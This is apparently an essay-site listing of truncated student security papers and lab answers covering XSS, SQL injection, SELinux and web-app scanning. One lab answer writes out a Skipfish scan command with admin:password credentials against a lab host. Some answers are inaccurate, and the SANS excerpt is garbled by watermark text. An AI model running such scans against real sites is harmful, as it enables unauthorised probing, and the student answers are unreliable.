...Security, 4 th Edition Chapter 1 Review Questions 1. What is the difference between a threat agent and a ... Chapter 1-Introduction to Information Security Principles of ... www.termpaperwarehouse.com › Computers and Technology Jun 16, 2014 - Chapter 1-Introduction to Information Security: 1. What is the difference between a threat and a threat agent? A threat is a constant danger to an ... Category:Threat Agent - OWASP https://www.owasp.org/index.php/Category:Threat_Agent May 15, 2012 - The term Threat Agent is used to indicate an individual or group that can ... Organized Crime and Criminals: Criminals target information that is of value ... Threat Risk Modeling is an activity to understand the security in an application. ... NET Project · Principles · Technologies · Threat Agents · Vulnerabilities ... Threat (computer) - Wikipedia, the free encyclopedia https://en.wikipedia.org/wiki/Threat_(computer) A more comprehensive definition, tied to an Information assurance point of view, can be found ... National Information Assurance Glossary defines threat as: .... OWASP: relationship between threat agent and business impact ... management principles, the countermeasures in order to accomplish to a security strategy set up ... Principles of Information Security - Page 40 - Google Books Result https://books.google.com.pk/books?isbn=1305176731 Michael E. Whitman, ‎Herbert J. Mattord - 2014 -...

Words: 598 - Pages: 3

Premium Essay

Research

...Interested in learning more about security? SANS Institute InfoSec Reading Room This paper is from the SANS Institute Reading Room site. Reposting is not permitted without express written permission. Web Based Attacks Copyright SANS Institute Author Retains Full Rights fu ll r igh ts. ins ut ho rr eta Web Based Attacks 07 ,A GCIA Gold Certification te 20 Key fingerprint = AF19 Justin Crist, jcrist@secureworks.com Author: FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 © SA NS In sti tu Adviser: Jim Purcell © SANS Institute 2007, As part of the Information Security Reading Room Author retains full rights. Web Based Attacks Abstract Attacks upon information security infrastructures have continued to evolve steadily overtime; legacy network based attacks have largely been replaced by more sophisticated This paper will introduce fu ll r igh ts. web application based attacks. and address web based attacks from attack to detection. Information security professionals new to application layer attacks will be in a better position to understand the ins underlying application attack vectors and methods of 07 ,A ut ho rr eta mitigation after reading this paper. © SA NS In sti tu te 20 Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 Justin Crist © SANS Institute 2007, 2 As part of the Information Security Reading Room Author retains full rights. Web Based Attacks Table of Contents Abstract.................................

Words: 10335 - Pages: 42

Premium Essay

Linux Ii Research Assignment - Linux Security Technologies

...Research Assignment Linux Security Technologies Kristy Graves ITT Tech – Dayton Linux II IT302 Mandatory Access Control Mandatory Access Control (MAC) is a system wide policy that relies on the current system to control access (Syracuse University, 2009). Users cannot alter or make any changes to this policy. Only the administrator has the clearance and authorization to make changes (The Computer Language Company Inc., 2012). Mandatory access control mechanisms are more than Discretionary Access Control (DAC) but have trade offs in performance and convenience to all users (The Open Web Application Security Project, 2002). Users can access lower level documentation, but they cannot access higher level without the process of declassification. Access is authorized or restricted based on the security characteristics of the HTTP client. This can be due to SSL bit length, version information, originating IP address or domain, etc. Systems supporting flexible security models can be SELinux, Trusted Solaris, TrustedBSD, etc. DAC checks the validity of the credentials given by the user. MAC validate aspects which are out of the hands of the user (Coar, 2000). If there is no DAC list on an object, full access is granted to any user (Microsoft, 2012). SELinux SELinux has three states of operation. These states are enforcing, permissive, and disabled. SELinux was developed by the U.S. National Security Agency (NSA) and implements MAC in a Linux kernel (Sobell, 2011). Enforcing...

Words: 875 - Pages: 4

Free Essay

Lab 3

...words. Cross-site scripting is when an attacker exploits the controls of a trusted website and injects malicious code with the intent of spreading it to other end users. For example, an attacker injects a browser script on a website, so that other users will click on it and compromise sensitive information. 3. What is a reflective cross-site scripting attack? A reflective cross-site scripting attack is when the injected script is reflected off the web server, much like an error message or search results. This type of attack is mostly carried out by e-mail messages in which the user is tricked by clicking on a malicious link and then the injected code travels to the vulnerable website and reflects the attack back to the user’s browser (OWASP, 2013). 4. What common method of obfuscation is used in most real-world SQL attacks? These methods include character scrambling, repeating character masking, numeric variance, nulling, artificial data generation, truncating, encoding, and aggregating. These methods rely on an array of built in SQL server system functions that are used for string manipulation (Magnabosco,...

Words: 283 - Pages: 2

Premium Essay

Lab 7

...IS3445 Security Strategies for Web Applications and Social Networking Lab 7 Assessment 05/10/14 1. How does Skipfish categorize findings in the scan report? As high risk flaws, medium risk flaws, and low issue scans 2. Which tool used in the lab is considered a static analysis tool? Explain what is referred to by static code analysis. RATS, because the running of static code analysis tools that attempt to highlight possible vulnerabilities within ‘static’ (non-running) source code. 3. What possible high risk vulnerabilities did the Rats tool find in the DVWA application source code? Allow system commands to execute. 4. Did the static analysis tool find all the potential security flaws in the application? Yes, although such tools like these would automatically find security flaws with high degree of confidence that what it found was a flaw. 5. What is black box testing on a web site or web application? They’re designed to threat the application as an “unknown entity”; therefore, no knowledge of the tiers is provided. 6. Explain the Skipfish command in detail: ./skipfish-o/var/scans/is308lab.org –A admin:password –d3 –b I –X logout.jsp –r200000 http://www.is308lab.org This is a standard, authenticated scan of a well-designed and self-contained site. 7. During the manual code review, what is noticed about high.php to make it less likely to vicitimize users with XSS reflection and why is it considered more secure? Because when a php is at high-level...

Words: 379 - Pages: 2

Premium Essay

Cyber Security

...become the most valuable member of your company. I have developed expertise in networks security, pentesting and managing IT functions on day-to-day basis. Never give up is my lethal weapon. I am committed to facing fresh challenges. KEY KNOWLEDGE, SKILLS & EXPERTISE__________________________________ Networks Skills: Nmap, complete control TCP / IP, VLAN, routing, BGP,UDP,ICMP Systems: Microsoft, Linux Ubuntu and Debian, CentOS, Android / virtualization: Citrix, Vmware. Foot-printing /Scanning/Gaining access/ aware of Trojans,Virues &Worms/ Sniffing Traffic Social Engineering / Session Hijacking /Exploiting web servers /Cryptography/ Metaspoit Security: VPN, Checkpoint, Juniper Firewall,Honeypots,IDS , Open Web Application Security Project (OWASP) Ideally ITIL incident management, problem management and change management Behavior-excellent communicator, professional, motivated, analytical thinker PROFESSIONAL EXPERIENCE______________________________________________ Royal Air Maroc (Oujda) Responsibilities Penetration tester /01/2014 - /12/2014 Perform penetration testing on web application, infrastructure, network and writing reports. Control and Audit for network devices, operating systems, and database. Manage access identity and users privileges. Alliances Group (Casablanca) Responsibilities Security Engineer /05/2013 - /11/2013 Used a variety of network security testing tools and exploits to identify vulnerabilities and writing reports. Performed intrusion test on web servers...

Words: 317 - Pages: 2

Premium Essay

The Importance Of Computer Security

...hackers and malicious insiders gain access to sensitive data (such as customer bank details and senior staff salary details), they can quickly extract value, inflict damage, or impact business operations. In addition to financial loss or reputation damage, such breaches can also result in regulatory violations, fines, and legal fees, which could have huge repercussions for a large multinational company such as YONS. The External Threat Fig.2 OWASP Top 10 advancements made by attackers between 2010 - 2013 The diagram above depicts the key factors in the enhancement made by attackers of a database. A common example of an external threat would be an outsider that may be able to gain unauthorised access to data by sending carefully created queries to a back-end database of a web application. As the diagram above illustrates, SQL injection attacks are the most common and, and dangerous form of attack. SQL injection vulnerabilities result from the dynamic creation of SQL queries in application programs that access a database system (OWASP 2013). In 2011, one of our main competitors, Sony, suffered what we believe to be an SQL injection attack to their Playstation Network, resulting in the personal details, passwords, security questions, and credit card details of many of their network’s online community being exposed, and we feel at YONS that we may have had a similar breach. Ensuring the security and privacy of data assets is a crucial and very difficult problem in the modern networked...

Words: 1729 - Pages: 7

Premium Essay

Cyber Attacks What Should America Do to Stop Them

...Cyberattacks: What Should America Do To Stop Them? Eric Gilliam Colorado Technical University Cyberattacks: What Should America Do To Stop Them? In the past few years, Cyberattacks have increased more than any cyber expert could have expected. Hackers and nation state sponsored attacks have risen about forty eight percent in 2014. America needs to do something now, before it gets worse. If we do not find a way to put a stop to these Cyberattacks hacker could essentially destroy our financial infrastructure. If this was to happen there would be no plastic to use for payment. Cyberattacks are here to stay. We need the help from ethical hackers to police the Cyberattacks world. When you watch the news, you hear about Cyberattacks on a daily basis. What you probably did not realize is “Cyberattacks cost business about 2.7 Million dollars per business” (White, 2014) per business. Cyberattacks are increasing and it is something we all need to look at. When this article came out, there were about 117,339 Cyberattacks every day. Now Cybercriminals are targeting mid-range businesses because larger businesses have increased their security. Cyberattacks can take down anything hackers want to destroy. “The UK National Security Strategy says that there is real risk. Attacks in cyberspace can have a potentially devastating real-world effect. Government, military, industrial and economic targets, including critical services” (Ncube, 2016), for example, hospitals or transportation...

Words: 516 - Pages: 3

Popular Essays

Representation of Interest Essay
Complaint Form Essay
Obesity Essay
Social Engineering Essay
Hsa Case Study Essay
Bacterial Meningitis Essay